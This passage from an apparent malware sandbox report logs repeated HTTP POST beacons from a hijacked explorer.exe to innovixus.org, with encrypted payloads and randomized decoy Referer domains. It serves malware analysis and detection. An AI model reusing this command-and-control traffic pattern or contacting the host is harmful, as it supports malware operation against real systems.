                                                                                                                                                              Referer: http://kaqrynuphgkohj.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:40.997145891 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:41.265997887 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:41 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              49192.168.11.2049803150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:41.468898058 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://vprmtfduvjnrilu.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:41.468898058 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:41.736274004 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:41 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              50192.168.11.2049804150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:41.945553064 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://odoxmkuvtytooabh.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:41.945553064 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:42.203222990 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:42 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              51192.168.11.2049805150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:42.412053108 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://mylrbdjvcbmfj.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:42.412053108 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:42.683463097 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:42 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              52192.168.11.2049806150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:42.885735989 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://amxaomyenejnyhfb.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:42.885735989 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:43.154871941 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:43 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              53192.168.11.2049807150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:43.380175114 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://oobloujskbbuck.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:43.380175114 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:43.631769896 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:43 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              54192.168.11.2049808150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:43.838110924 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://dcscufdendfpxgut.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:43.838110924 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:44.094383955 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:43 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              55192.168.11.2049809150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:44.298263073 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://syphtbjopfn.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:44.298263073 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:44.556416988 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:44 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              56192.168.11.2049810150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:44.759752989 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://mgfjvqnlmadmkqm.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:44.759802103 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:45.022758961 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:44 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              57192.168.11.2049811150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:45.235368967 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://lbmeyvwtbwrk.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:45.235368967 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:45.493963957 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:45 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              58192.168.11.2049812150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:45.695131063 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://uyitnqmuxncrjl.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:45.695131063 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:45.950311899 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:45 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              59192.168.11.2049813150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:46.151835918 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://oehixvokjmpir.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:46.151835918 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:46.408674955 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:46 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              60192.168.11.2049814150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:46.609174967 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://mysdexmriwui.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:46.609174967 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:46.874074936 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:46 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              61192.168.11.2049815150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:47.079863071 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ltlcojpocalwr.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:47.079863071 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:48.351655960 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:48 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              62192.168.11.2049816150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:48.556113958 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://udhiwdowdyed.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:48.556113958 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
